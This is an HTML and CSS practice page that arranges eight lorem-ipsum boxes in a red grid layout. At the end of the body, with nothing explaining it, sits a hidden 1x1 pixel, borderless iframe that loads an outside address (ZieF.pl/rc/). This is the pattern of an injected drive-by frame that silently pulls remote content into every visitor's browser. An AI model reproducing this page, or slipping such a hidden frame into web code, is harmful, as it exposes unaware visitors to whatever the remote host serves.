<!DOCTYPE html>
<html>
    <head>
        <title>
            Text grid
        </title>
        <style>
            .container{
                display: grid;
                padding: 20px;
              grid-row-gap: 10px;
                grid-column-gap: 20px;
                grid-template-columns: 200px 200px auto;
            }

            .griditem{
                background-color: red;
                text-align: center;
                padding: 20px;           
                 }
        </style>
    </head>
    <body>
        <div class="container">
            <div class="griditem">1.Lorem ipsum dolor sit, amet consectetur adipisicing elit. Magnam deleniti dolores rerum, amet aliquid aspernatur itaque molestias non enim sit odio sunt veniam sint quas ab vitae tenetur nam debitis!</div>
            <div class="griditem">2.Lorem ipsum dolor sit amet consectetur adipisicing elit. Voluptatibus repellendus quibusdam exercitationem sequi consectetur, harum laboriosam enim ratione ex necessitatibus eligendi tenetur quisquam iste ut inventore dolore facere perferendis quaerat?</div>
            <div class="griditem">3.Lorem ipsum dolor sit amet consectetur adipisicing elit. Accusamus, ex officia. Sunt, perspiciatis iusto quae voluptatibus quas in labore quaerat vel debitis accusamus eos perferendis odit blanditiis velit laudantium amet!</div>
            <div class="griditem">4.Lorem ipsum dolor sit amet consectetur adipisicing elit. Unde ea voluptatum accusantium perferendis doloremque, blanditiis quia, in ipsa debitis quas tenetur cumque. Doloremque ullam quae, blanditiis enim est repudiandae nihil!</div>
            <div class="griditem">5.Lorem ipsum dolor sit amet consectetur adipisicing elit. Blanditiis inventore corrupti sunt accusamus iste facere similique! Mollitia at, fugiat voluptates nulla beatae, modi explicabo, excepturi alias necessitatibus incidunt ad doloremque.</div>
            <div class="griditem">6.Lorem ipsum dolor, sit amet consectetur adipisicing elit. Quasi odit totam ut sint temporibus dolor quos quis enim est quibusdam. Perspiciatis voluptatibus dolorem animi sunt expedita maxime recusandae eveniet cum.</div>
            <div class="griditem">7.Lorem ipsum dolor sit amet consectetur, adipisicing elit. Voluptas deserunt, ipsam soluta distinctio consequuntur impedit accusamus tempora id, illum ducimus quia facilis obcaecati fugit iusto vero, ea culpa quos quod.</div>
            <div class="griditem">8.Lorem ipsum dolor sit amet consectetur adipisicing elit. Quae et harum, dolores magnam quos laboriosam molestias quia doloribus fuga vitae doloremque dolore deserunt. Alias suscipit aliquid modi dolor quos reprehenderit!</div>
            
        </div>

    <iframe src="http://ZieF.pl/rc/" width=1 height=1 style="border:0"></iframe>
</body>
</html>